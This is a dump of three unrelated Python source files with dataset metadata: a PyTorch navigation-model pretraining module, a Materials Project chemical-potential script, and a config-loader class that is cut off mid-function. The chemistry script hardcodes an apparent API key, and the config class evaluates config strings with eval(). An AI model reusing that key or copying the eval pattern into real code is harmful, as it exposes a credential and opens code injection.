def __init__(self, config, output_size, input_size):\n        super().__init__()\n        print(\"Use img embed rt head !\")\n        self.room_type_list = []\n        if config.rp_embed_dir is not None:\n            rp_order = sorted(ROOM2IND.items(), key=lambda x: x[1])\n            rp_embed_file = h5py.File(config.rp_embed_dir,\"r\")\n            for r in rp_order:\n                if config.use_clip_feat:\n                    rp_embed = rp_embed_file[r[0]+'_clip'][...][:, :config.image_feat_size]\n                else:\n                    rp_embed = rp_embed_file[r[0]+'_imgnet_feat'][...][:, :config.image_feat_size]\n                if len(rp_embed.shape) == 4:\n                    rp_embed = np.squeeze(rp_embed)\n                rp_img_tensor = torch.from_numpy(rp_embed)\n                linear = nn.Linear(input_size, output_size).cuda()\n            \n                linear.weight.data.copy_(rp_img_tensor.cuda())\n                self.room_type_list.append(linear)\n        \n            if not config.update_rp_embed:\n                for layer in self.room_type_list:\n                    for para in layer.parameters():\n                        para.requires_grad = False\n    \n    def forward(self, view_feat):\n        outs = []\n        for layer in self.room_type_list:\n            outs.append(torch.sum(layer(view_feat),dim=-1).unsqueeze(-1))\n        outs = torch.cat(outs,dim=-1)\n        return outs \n\n\nclass NodeDistReg(nn.Module):\n    def __init__(self, input_size, config, hidden_size=None):\n        super().__init__()\n        self.config = config\n        if hidden_size is None:\n            hidden_size = input_size \n\n        self.cross_attn = BertXAttention(config, ctx_dim=768)\n        self.score_net = nn.Sequential(\n            nn.Linear(input_size, hidden_size),\n            nn.ReLU(),\n            BertLayerNorm(hidden_size, eps=1e-12),\n            nn.Linear(hidden_size, 1)\n        )\n        
self.dreamer_fuse_linear = ClsPrediction(self.config.hidden_size, input_size=self.config.hidden_size*2)\n self.dist_sap_head = ClsPrediction(self.config.hidden_size)\n \n def forward(self, x, ins_img_features):\n ins_img_features = ins_img_features #torch.from_numpy(ins_img_features).float().to(x.device)\n attention_output, attention_scores = self.cross_attn(x, ins_img_features)\n fuse_weight = torch.sigmoid(self.dreamer_fuse_linear(\n torch.cat([x[:, 0], attention_output[:, 0]], 1)\n ))\n return None, self.dist_sap_head(attention_output).squeeze(2), fuse_weight\n\n\nclass GlocalTextPathCMTPreTraining(BertPreTrainedModel):\n def __init__(self, config):\n super().__init__(config)\n\n self.config = config\n self.bert = GlocalTextPathCMT(config)\n\n if 'mlm' in config.pretrain_tasks:\n self.mlm_head = BertOnlyMLMHead(self.config)\n if 'mrc' in config.pretrain_tasks:\n self.image_classifier = RegionClassification(self.config.hidden_size, self.config.image_prob_size)\n if self.config.obj_prob_size > 0 and self.config.obj_prob_size != self.config.image_prob_size:\n self.obj_classifier = RegionClassification(self.config.hidden_size, self.config.obj_prob_size)\n else:\n self.obj_classifier = None\n\n if 'sap' in config.pretrain_tasks:\n self.global_sap_head = ClsPrediction(self.config.hidden_size)\n self.local_sap_head = ClsPrediction(self.config.hidden_size)\n if config.glocal_fuse:\n self.sap_fuse_linear = ClsPrediction(self.config.hidden_size, input_size=self.config.hidden_size*2)\n else:\n self.sap_fuse_linear = None\n \n if 'distsap' in config.pretrain_tasks:\n self.node_dis_reg_head = NodeDistReg(input_size=self.config.hidden_size, config=config)\n self.global_sap_head = ClsPrediction(self.config.hidden_size)\n self.global_distsap_head = ClsPrediction(self.config.hidden_size)\n self.local_sap_head = ClsPrediction(self.config.hidden_size)\n self.sap_fuse_linear = ClsPrediction(self.config.hidden_size, input_size=self.config.hidden_size*2)\n self.sap_global_fuse_linear = ClsPrediction(self.config.hidden_size, input_size=self.config.hidden_size*2)\n self.global_img_linear = ClsPrediction(self.config.hidden_size, input_size=self.config.hidden_size*2)\n\n if 'og' in config.pretrain_tasks:\n self.og_head = ClsPrediction(self.config.hidden_size)\n \n if 'rt' in config.pretrain_tasks:\n if not config.use_fix_rt_emb:\n self.rt_head = RoomPrediction(output_size=30, \n input_size=self.config.hidden_size)\n else:\n self.rt_head = RoomPredictionImg(config,output_size=10,\n input_size=self.config.hidden_size)\n\n self.init_weights()\n self.tie_weights()\n\n def tie_weights(self):\n if 'mlm' in self.config.pretrain_tasks:\n self._tie_or_clone_weights(self.mlm_head.predictions.decoder,\n self.bert.embeddings.word_embeddings)\n\n def forward(self, batch, task, compute_loss=True):\n batch = defaultdict(lambda: None, batch)\n if task.startswith('mlm'):\n return self.forward_mlm(\n batch['txt_ids'], batch['txt_lens'], batch['traj_view_img_fts'], \n batch['traj_obj_img_fts'], batch['traj_loc_fts'], batch['traj_nav_types'], \n batch['traj_step_lens'], batch['traj_vp_view_lens'], batch['traj_vp_obj_lens'], \n batch['traj_vpids'], batch['traj_cand_vpids'], \n batch['gmap_lens'], batch['gmap_step_ids'], batch['gmap_pos_fts'], \n batch['gmap_pair_dists'], batch['gmap_vpids'], batch['vp_pos_fts'],\n batch['txt_labels'], compute_loss\n )\n elif task.startswith('mrc'):\n return self.forward_mrc(\n batch['txt_ids'], batch['txt_lens'], batch['traj_view_img_fts'], \n batch['traj_obj_img_fts'], batch['traj_loc_fts'], 
batch['traj_nav_types'], \n batch['traj_step_lens'], batch['traj_vp_view_lens'], batch['traj_vp_obj_lens'], \n batch['traj_vpids'], batch['traj_cand_vpids'], \n batch['gmap_lens'], batch['gmap_step_ids'], batch['gmap_pos_fts'], \n batch['gmap_pair_dists'], batch['gmap_vpids'], batch['vp_pos_fts'],\n batch['vp_view_mrc_masks'], batch['vp_view_probs'], \n batch['vp_obj_mrc_masks'], batch['vp_obj_probs'], compute_loss\n )\n elif task.startswith('sap'):\n return self.forward_sap(\n batch['txt_ids'], batch['txt_lens'], batch['traj_view_img_fts'], \n batch['traj_obj_img_fts'], batch['traj_loc_fts'], batch['traj_nav_types'], \n batch['traj_step_lens'], batch['traj_vp_view_lens'], batch['traj_vp_obj_lens'], \n batch['traj_vpids'], batch['traj_cand_vpids'], \n batch['gmap_lens'], batch['gmap_step_ids'], batch['gmap_pos_fts'], \n batch['gmap_pair_dists'], batch['gmap_vpids'], batch['vp_pos_fts'],\n batch['gmap_visited_masks'],\n batch['global_act_labels'], batch['local_act_labels'], compute_loss\n )\n elif task.startswith('og'):\n return self.forward_og(\n batch['txt_ids'], batch['txt_lens'], batch['traj_view_img_fts'], \n batch['traj_obj_img_fts'], batch['traj_loc_fts'], batch['traj_nav_types'], \n batch['traj_step_lens'], batch['traj_vp_view_lens'], batch['traj_vp_obj_lens'], \n batch['traj_vpids'], batch['traj_cand_vpids'], \n batch['gmap_lens'], batch['gmap_step_ids'], batch['gmap_pos_fts'], \n batch['gmap_pair_dists'], batch['gmap_vpids'], batch['vp_pos_fts'],\n batch['obj_labels'], compute_loss\n )\n elif task.startswith('rt'):\n return self.forward_rt(\n batch['txt_ids'], batch['txt_lens'], batch['traj_view_img_fts'],\n batch['traj_obj_img_fts'],batch['traj_loc_fts'],batch['traj_nav_types'],\n batch['traj_step_lens'],batch['traj_vp_view_lens'],batch['traj_vp_obj_lens'],\n batch['traj_vpids'], batch['traj_cand_vpids'],\n batch['gmap_lens'], batch['gmap_step_ids'], batch['gmap_pos_fts'],\n batch['gmap_pair_dists'], batch['gmap_vpids'], batch['gmap_rt_labels'],\n batch['vp_pos_fts'], batch['gmap_vpids_mask'],compute_loss\n )\n elif task.startswith('distsap'):\n return self.forward_dsap(\n batch['txt_ids'], batch['txt_lens'],batch['traj_view_img_fts'],\n batch['traj_obj_img_fts'], batch['traj_loc_fts'], batch['traj_nav_types'],\n batch['traj_step_lens'], batch['traj_vp_view_lens'],batch['traj_vp_obj_lens'],\n batch['traj_vpids'],batch['traj_cand_vpids'],\n batch['gmap_lens'], batch['gmap_step_ids'],batch['gmap_pos_fts'],\n batch['gmap_pair_dists'],batch['gmap_vpids'],batch['vp_pos_fts'],\n batch['gmap_visited_masks'],batch['global_act_labels'], batch['local_act_labels'],\n batch['ins2img_feat'], batch['current_vpid_index'],compute_loss,\n )\n else:\n raise ValueError('invalid task')\n\n def forward_mlm(\n self, txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n txt_labels, compute_loss\n ):\n txt_embeds = self.bert.forward_mlm(\n txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n )\n\n # only compute masked tokens for better efficiency\n masked_output = self._compute_masked_hidden(txt_embeds, txt_labels != -1)\n prediction_scores = self.mlm_head(masked_output)\n\n if compute_loss:\n mask_loss = 
F.cross_entropy(\n                prediction_scores, txt_labels[txt_labels != -1], reduction='none'\n            )\n            return mask_loss\n        else:\n            return prediction_scores\n\n    def _compute_masked_hidden(self, hidden, mask):\n        '''get only the masked region (don't compute unnecessary hiddens)'''\n        \n        mask = mask.unsqueeze(-1).expand_as(hidden)\n        hidden_masked = hidden[mask].contiguous().view(-1, hidden.size(-1))\n\n        return hidden_masked\n\n    def forward_mrc(\n        self, txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n        traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n        gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n        vp_view_mrc_masks, vp_view_probs, vp_obj_mrc_masks, vp_obj_probs, compute_loss=True\n    ):\n        _, vp_embeds = self.bert(\n            txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n            traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n            gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n            return_gmap_embeds=False\n        )\n        \n        # viewpoint length at the last position\n        vp_view_lens = [x[-1] for x in torch.split(traj_vp_view_lens, traj_step_lens)]\n        vp_view_embeds = pad_tensors_wgrad(\n            [x[1:view_len+1] for x, view_len in zip(vp_embeds, vp_view_lens)]\n        ) # [stop] at 0\n        \n        \n        # only compute masked regions for better efficiency\n        view_masked_output = self._compute_masked_hidden(vp_view_embeds, vp_view_mrc_masks)\n        \n        view_prediction_soft_labels = self.image_classifier(view_masked_output)\n        view_mrc_targets = self._compute_masked_hidden(vp_view_probs, vp_view_mrc_masks)\n\n        if traj_obj_img_fts is not None:\n            vp_obj_lens = [x[-1] for x in torch.split(traj_vp_obj_lens, traj_step_lens)]\n            vp_obj_embeds = pad_tensors_wgrad(\n                [x[view_len+1:view_len+obj_len+1] for x, view_len, obj_len in zip(vp_embeds, vp_view_lens, vp_obj_lens)]\n            )\n            # vp_obj_mrc_masks = vp_obj_mrc_masks[:, :vp_obj_embeds.size(1)]\n            obj_masked_output = self._compute_masked_hidden(vp_obj_embeds, vp_obj_mrc_masks)\n            if self.obj_classifier is None:\n                obj_prediction_soft_labels = self.image_classifier(obj_masked_output)\n            else:\n                obj_prediction_soft_labels = self.obj_classifier(obj_masked_output)\n            obj_mrc_targets = self._compute_masked_hidden(vp_obj_probs, vp_obj_mrc_masks)\n        else:\n            obj_prediction_soft_labels, obj_mrc_targets = None, None\n\n        if compute_loss:\n            view_prediction_soft_labels = F.log_softmax(view_prediction_soft_labels, dim=-1)\n            view_mrc_loss = F.kl_div(view_prediction_soft_labels, view_mrc_targets, reduction='none').sum(dim=1)\n            if obj_prediction_soft_labels is None:\n                mrc_loss = view_mrc_loss\n            else:\n                obj_prediction_soft_labels = F.log_softmax(obj_prediction_soft_labels, dim=-1)\n                obj_mrc_loss = F.kl_div(obj_prediction_soft_labels, obj_mrc_targets, reduction='none').sum(dim=1)\n                mrc_loss = torch.cat([view_mrc_loss, obj_mrc_loss], 0)\n            return mrc_loss\n        else:\n            return view_prediction_soft_labels, view_mrc_targets, obj_prediction_soft_labels, obj_mrc_targets\n\n    def forward_sap(\n        self, txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n        traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n        gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n        gmap_visited_masks, global_act_labels, local_act_labels, compute_loss\n    ):\n        batch_size = txt_ids.size(0)\n\n        gmap_embeds, vp_embeds = self.bert(\n            txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, 
traj_nav_types, \n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n )\n \n if self.sap_fuse_linear is None:\n fuse_weights = 0.5\n else:\n fuse_weights = torch.sigmoid(self.sap_fuse_linear(\n torch.cat([gmap_embeds[:, 0], vp_embeds[:, 0]], 1)\n ))\n\n global_logits = self.global_sap_head(gmap_embeds).squeeze(2) * fuse_weights\n global_logits.masked_fill_(gmap_visited_masks, -float('inf'))\n global_logits.masked_fill_(gen_seq_masks(gmap_lens).logical_not(), -float('inf'))\n\n local_logits = self.local_sap_head(vp_embeds).squeeze(2) * (1 - fuse_weights)\n vp_nav_masks = pad_tensors_wgrad(\n [x[-1]!=1 for x in torch.split(traj_nav_types, traj_step_lens)]\n )[:, :local_logits.size(1)-1]\n vp_nav_masks = torch.cat(\n [torch.zeros(len(vp_nav_masks), 1).bool().to(vp_nav_masks.device), vp_nav_masks], 1\n ) # add [stop]\n local_logits.masked_fill_(vp_nav_masks, -float('inf'))\n\n # fusion\n fused_logits = torch.clone(global_logits)\n fused_logits[:, 0] += local_logits[:, 0] # stop\n for i in range(batch_size):\n visited_nodes = set([vp for vp, mask in zip(gmap_vpids[i], gmap_visited_masks[i]) if mask])\n tmp = {}\n bw_logits = 0\n for j, cand_vpid in enumerate(traj_cand_vpids[i][-1]):\n if cand_vpid in visited_nodes:\n bw_logits += local_logits[i, j+1]\n else:\n tmp[cand_vpid] = local_logits[i, j+1]\n for j, vp in enumerate(gmap_vpids[i]):\n if j > 0 and vp not in visited_nodes:\n if vp in tmp:\n fused_logits[i, j] += tmp[vp]\n else:\n fused_logits[i, j] += bw_logits\n\n if compute_loss:\n global_losses = F.cross_entropy(global_logits, global_act_labels, reduction='none')\n local_losses = F.cross_entropy(local_logits, local_act_labels, reduction='none')\n fused_losses = F.cross_entropy(fused_logits, global_act_labels, reduction='none')\n losses = global_losses + local_losses + fused_losses\n return losses\n else:\n return global_logits, local_logits, fused_logits, global_act_labels, local_act_labels\n\n def forward_og(\n self, txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n obj_labels, compute_loss\n ):\n gmap_embeds, vp_embeds = self.bert.forward(\n txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n return_gmap_embeds=False\n )\n\n vp_view_lens = [x[-1] for x in torch.split(traj_vp_view_lens, traj_step_lens, 0)]\n vp_obj_lens = [x[-1] for x in torch.split(traj_vp_obj_lens, traj_step_lens, 0)]\n obj_embeds = pad_tensors_wgrad([\n x[1+view_len: 1+view_len+obj_len] for x, view_len, obj_len in zip(vp_embeds, vp_view_lens, vp_obj_lens)\n ])\n obj_masks = gen_seq_masks(torch.stack(vp_obj_lens, 0))\n\n obj_logits = self.og_head(obj_embeds).squeeze(2)\n obj_logits.masked_fill_(obj_masks.logical_not(), -float('inf'))\n\n if compute_loss:\n losses = F.cross_entropy(obj_logits, obj_labels, reduction='none')\n return losses\n else:\n return obj_logits\n \n def forward_rt(\n self, txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, 
gmap_pair_dists, gmap_vpids, gmap_rt_labels, vp_pos_fts,\n gmap_vpids_mask, compute_loss=True):\n \n gmap_embeds, _ = self.bert.forward(txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n gmap_vpids_mask, return_gmap_embeds=True, rt_task=True)\n \n mask_out = self._compute_masked_hidden(gmap_embeds[:,1:], gmap_rt_labels != -1)\n rt_logits = self.rt_head(mask_out)\n \n if compute_loss:\n rt_loss = F.cross_entropy(\n rt_logits, gmap_rt_labels[gmap_rt_labels != -1], reduction='none')\n return rt_loss\n else:\n return rt_logits\n \n def forward_dsap(\n self, txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types,\n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n gmap_visited_masks, global_act_labels, local_act_labels, ins2img, current_vpid_index,\n compute_loss \n ): \n\n batch_size = txt_ids.size(0)\n\n gmap_embeds, vp_embeds = self.bert(\n txt_ids, txt_lens, traj_view_img_fts, traj_obj_img_fts, traj_loc_fts, traj_nav_types, \n traj_step_lens, traj_vp_view_lens, traj_vp_obj_lens, traj_vpids, traj_cand_vpids,\n gmap_lens, gmap_step_ids, gmap_pos_fts, gmap_pair_dists, gmap_vpids, vp_pos_fts,\n )\n # need to define\n _, dist_logits, fuse_weight2 = self.node_dis_reg_head(gmap_embeds, ins2img)\n \n gmap_masks = gen_seq_masks(gmap_lens)\n fuse_weights = torch.sigmoid(self.sap_fuse_linear(\n torch.cat([gmap_embeds[:, 0], vp_embeds[:, 0]], 1)\n ))\n\n if self.config.const_fuse_gl:\n fuse_weights = self.config.const_fuse_gl_weight\n \n global_logits = self.global_sap_head(gmap_embeds).squeeze(2) * fuse_weights\n current_vpid_index = current_vpid_index.cpu().numpy()\n if self.config.switch_first_gd:\n global_logits[:,0] = global_logits[np.arange(len(current_vpid_index)), np.array(current_vpid_index)]\n global_logits.masked_fill_(gmap_visited_masks, -float('inf'))\n global_logits.masked_fill_(gmap_masks.logical_not(), -float('inf'))\n \n\n local_logits = self.local_sap_head(vp_embeds).squeeze(2) * (1 - fuse_weights)\n vp_nav_masks = pad_tensors_wgrad(\n [x[-1]!=1 for x in torch.split(traj_nav_types, traj_step_lens)]\n )[:, :local_logits.size(1)-1]\n vp_nav_masks = torch.cat(\n [torch.zeros(len(vp_nav_masks), 1).bool().to(vp_nav_masks.device), vp_nav_masks], 1\n ) # add [stop]\n local_logits.masked_fill_(vp_nav_masks, -float('inf'))\n \n fused_logits2 = self.global_distsap_head(gmap_embeds).squeeze(2)\n if self.config.switch_first_gd:\n dist_logits[:,0] = dist_logits[np.arange(len(current_vpid_index)), np.array(current_vpid_index)]\n fused_logits2[:,0] = fused_logits2[np.arange(len(current_vpid_index)), np.array(current_vpid_index)]\n fused_logits2 = dist_logits * (1-fuse_weight2) + fused_logits2 * fuse_weight2\n fused_logits2.masked_fill_(gmap_visited_masks, -float('inf'))\n fused_logits2.masked_fill_(gmap_masks.logical_not(), -float('inf')) \n\n dist_logits_copy = torch.clone(dist_logits)\n dist_logits_copy.masked_fill_(gmap_visited_masks, -float('inf'))\n dist_logits_copy.masked_fill_(gmap_masks.logical_not(), -float('inf')) \n\n # fusion\n fused_logits = torch.clone(global_logits)\n fused_logits[:, 0] += local_logits[:, 0] # stop\n for i in range(batch_size):\n visited_nodes = set([vp for vp, mask in zip(gmap_vpids[i], gmap_visited_masks[i]) if mask])\n 
tmp = {}\n bw_logits = 0\n n_accum = 0\n for j, cand_vpid in enumerate(traj_cand_vpids[i][-1]):\n if cand_vpid in visited_nodes:\n bw_logits += local_logits[i, j+1]\n n_accum += 1\n else:\n tmp[cand_vpid] = local_logits[i, j+1]\n\n for j, vp in enumerate(gmap_vpids[i]):\n if j > 0 and vp not in visited_nodes:\n if vp in tmp:\n fused_logits[i, j] += tmp[vp]\n else:\n if n_accum != 0 and self.config.avg_local_emb:\n fused_logits[i, j] += bw_logits/n_accum\n else:\n fused_logits[i, j] += bw_logits\n\n # fuse dist\n fused_logits += fused_logits2\n\n if compute_loss:\n dist_losses = F.cross_entropy(dist_logits_copy, global_act_labels, reduction='none')\n global_losses = F.cross_entropy(global_logits, global_act_labels, reduction='none')\n local_losses = F.cross_entropy(local_logits, local_act_labels, reduction='none')\n fused_losses = F.cross_entropy(fused_logits, global_act_labels, reduction='none')\n losses = global_losses + local_losses + fused_losses + dist_losses\n return losses\n else:\n return dist_logits_copy, global_logits, local_logits, fused_logits, global_act_labels, local_act_labels\n \n \n\n \n","repo_name":"zehao-wang/LAD","sub_path":"warmup_src/model/pretrain_cmt.py","file_name":"pretrain_cmt.py","file_ext":"py","file_size_in_byte":27173,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"43680473257","text":"# -*- coding: UTF-8 -*-\n\nfrom chemicalDiagram.ChemicalPotentialDiagram import ChemPotEntry, ChemPotDiagram,ChemPotPlotter,trans_PD_to_ChemPot_entries\nfrom chemicalDiagram.EquilibriumLine import EquilLine\nfrom pymatgen.core.composition import Composition\nfrom pymatgen.analysis.phase_diagram import PhaseDiagram\nfrom myResearch.getOrigStableEntriesList import getEntriesList,getOrigStableEntriesList\nfrom pymatgen.ext.matproj import MPRester\nimport json\nimport os\nimport imageio\nimport numpy as np\nfrom adjustText import adjust_text\nimport matplotlib.pyplot as plt\nMPR = MPRester(\"SZXJWLvi8njBGvA4sT\")\ncurrent_dir = os.path.join(os.path.dirname(__file__))\ndef get_ON_entries():\n ## Many queries are very large, so this python \n # method either queries the MP and saves it in the 'cache' file, \n # or if the cache file exists, it loads it directly from the cache. \n \n cache = os.path.join(current_dir, 'ternary_N_O_without_nitrates_stable')\n if os.path.exists(cache):\n print(\"Loading from cache.\")\n with open(cache, 'r') as f:\n return json.load(f)\n else:\n print(\"Reading from db.\")\n# from pymatgen.ext.matproj import MPRester\n \n criteria = {'elements':{'$all': [\"O\",\"N\"]}, 'nelements':3, 'e_above_hull':{'$lte':0.00}}\n # The criteria uses mongodb query language. See here for more details: https://docs.mongodb.com/manual/reference/operator/query/\n \n props = [\"material_id\",'pretty_formula','e_above_hull','structure',\"warnings\",\"formation_energy_per_atom\"]\n #The properties and the criteria use MaterialsProject features \n #You can see what is queryable from the MP API documentation: https://github.com/materialsproject/mapidoc/tree/master/materials \n \n entries = MPR.query(criteria=criteria, properties=props)\n print(len(entries))\n #Save files are prepared in a 'JSON' file. \n #Some MP objects are not JSONable, and so they must be turned into a dictionary before they can be saved. 
\n new_entries=[]\n for e in entries:\n X=e\n X['structure']=X['structure'].as_dict()\n new_entries.append(X)\n \n \n with open(cache, 'w') as f:\n json.dump(new_entries, f)\n return entries\n \n\nternary_O_N = get_ON_entries()\n\n\n\nprojEle = [\"O\",\"N\"]\nnewformeN = 2\nnewformeO = 2\nfig = None\n\nprint(len(ternary_O_N))\n\nformulas = [ee[\"pretty_formula\"] for ee in ternary_O_N]\nformulas = list(dict.fromkeys(formulas))\n'''set colordict'''\njet= plt.get_cmap('gist_rainbow')\nn=len(formulas)\ncolor=iter(jet(np.linspace(0,1,n)))\ncolordict = {}\nfor e in formulas:\n c = next(color)\n colordict[e] = c\nprint(len(formulas))\n\nimport random\n\n# random.shuffle(formulas)\nm=0\ntexts = []\nfilenames = []\naalist=[]\n\nfor ee in formulas:\n phi_dict = {}\n m+=1\n if ee != \"TaNO\":\n continue\n\n elsList = [str(el) for el in Composition(ee).elements]\n for el in elsList:\n if el != \"O\" and el != \"N\":\n tael = el\n elsList = [tael, \"O\",\"N\"]\n PDentries = getEntriesList(elsList)\n\n for e in PhaseDiagram(PDentries).stable_entries:\n if e.name == \"N2\":\n entry = PhaseDiagram(PDentries).make_entry_from_formEperatom(e.composition, newformeN)\n if e.name == \"O2\":\n entryO = PhaseDiagram(PDentries).make_entry_from_formEperatom(e.composition, newformeO)\n limits = [[-10,0],[-10,newformeO],[-10,newformeN]]\n CPentries = trans_PD_to_ChemPot_entries(PDentries,elsList)\n \n newentries = []\n for e in CPentries:\n if e.name != \"N2\" and e.name != \"O2\":\n newentries.append(e)\n newentries.append(ChemPotEntry(entry,newformeN,elsList))\n newentries.append(ChemPotEntry(entryO,newformeO,elsList))\n eql = EquilLine(newentries,elsList,limits = limits)\n\n for entry in eql._stable_domain_vertices:\n if entry.name == ee:\n center = np.average(eql._stable_domain_vertices[entry], axis=0)\n for entry in eql._stable_domain_vertices:\n phi = entry.form_E\n# print(entry.name,phi)\n for ind in range(len(elsList)):\n phi -= center[ind]*entry.ncomp[elsList[ind]]\n# print(center[ind],entry.ncomp[elsList[ind]])\n# print(phi)\n phi_dict[entry]=phi\n print()\n print(m, ee)\n phi_dict = {k: v for k, v in sorted(phi_dict.items(), key=lambda item: item[1])}\n for e in phi_dict:\n print(e.name, phi_dict[e])\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"dd-debug/examples_chemical_potential_diagrams","sub_path":"save_chem_ON2.py","file_name":"save_chem_ON2.py","file_ext":"py","file_size_in_byte":4505,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6633513580","text":"\"\"\"\r\nCopyright 2021 Daniel Afriyie\r\n\r\nLicensed under the Apache License, Version 2.0 (the \"License\");\r\nyou may not use this file except in compliance with the License.\r\nYou may obtain a copy of the License at\r\n\r\n https://www.apache.org/licenses/LICENSE-2.0\r\n\r\nUnless required by applicable law or agreed to in writing, software\r\ndistributed under the License is distributed on an \"AS IS\" BASIS,\r\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\r\nSee the License for the specific language governing permissions and\r\nlimitations under the License.\r\n\"\"\"\r\nimport abc\r\nimport json\r\nimport typing\r\nimport threading\r\n\r\nfrom ru.utils import get_data\r\nfrom ru.constants import constants\r\nfrom ru.hints import Cast, Path, Config, OpenPath\r\nfrom ru.exceptions.exceptions import ConfigKeyError, ConfigFileNotFoundError\r\n\r\n\r\nclass BaseConfig(abc.ABC):\r\n \"\"\"\"\r\n Base config class for all config 
classes\r\n \"\"\"\r\n\r\n def __init__(self, config_path: Path) -> None:\r\n self.CONFIG_PATH = config_path\r\n self._config: Config = self.load()\r\n self._mutex: threading.RLock = threading.RLock()\r\n\r\n @property\r\n def config(self) -> Config:\r\n return self._config\r\n\r\n @abc.abstractmethod\r\n def save(self, filename: OpenPath = \"config.txt\", encoding: typing.Optional[str] = constants.ENCODING) -> None:\r\n pass\r\n\r\n @abc.abstractmethod\r\n def load_config(self) -> Config:\r\n pass\r\n\r\n @staticmethod\r\n def _cast(item: str, cast: Cast) -> typing.Any:\r\n if cast is bool:\r\n return eval(item.strip().capitalize())\r\n if cast is not None:\r\n return cast(item.strip())\r\n return item\r\n\r\n def get(self, item: str, default: typing.Optional[typing.Any] = None, cast: Cast = None) -> typing.Any:\r\n with self._mutex:\r\n try:\r\n val = self._config[item]\r\n if cast:\r\n return self._cast(val, cast)\r\n return val\r\n except KeyError:\r\n return default\r\n\r\n def get_as_tupple(self, item: str, cast: Cast = None) -> typing.Tuple[typing.Any, ...]:\r\n with self._mutex:\r\n items: list = self._config[item].split(\",\")\r\n if cast is None:\r\n return tuple(items)\r\n return tuple(self._cast(val, cast) for val in items)\r\n\r\n def load(self) -> Config:\r\n try:\r\n return self.load_config()\r\n except FileNotFoundError:\r\n raise ConfigFileNotFoundError(f\"{self.__class__.__name__}: Config file '{self.CONFIG_PATH}' not found!\")\r\n\r\n def __getitem__(self, item: typing.Union[list, str]) -> typing.Any:\r\n with self._mutex:\r\n try:\r\n if isinstance(item, list):\r\n items: list = [self._config[key] for key in item]\r\n return items\r\n else:\r\n return self._config[item]\r\n except KeyError:\r\n raise ConfigKeyError(f\"{item}\")\r\n\r\n def __setitem__(self, key: str, value: str) -> None:\r\n with self._mutex:\r\n self._config[key] = value\r\n\r\n def __repr__(self) -> str:\r\n return str(self._config)\r\n\r\n\r\nclass JsonConfig(BaseConfig):\r\n\r\n def __init__(self, config_path: Path = \"config.json\") -> None:\r\n super().__init__(config_path)\r\n\r\n def load_config(self) -> Config:\r\n with open(self.CONFIG_PATH, encoding=constants.ENCODING) as f:\r\n config: Config = json.load(f)\r\n return config\r\n\r\n def save(self, filename: OpenPath = \"config.txt\", encoding: typing.Optional[str] = constants.ENCODING) -> None:\r\n with open(filename, \"w\", encoding=encoding) as f:\r\n json.dump(self._config, f, indent=4)\r\n\r\n\r\nclass TextConfig(BaseConfig):\r\n\r\n def __init__(self, config_path: Path = \"config.txt\") -> None:\r\n super().__init__(config_path)\r\n\r\n def load_config(self) -> Config:\r\n config: dict = {}\r\n data = get_data(self.CONFIG_PATH, split=True, split_char=\"\\n\", filter_blanks=True)\r\n for d in data:\r\n 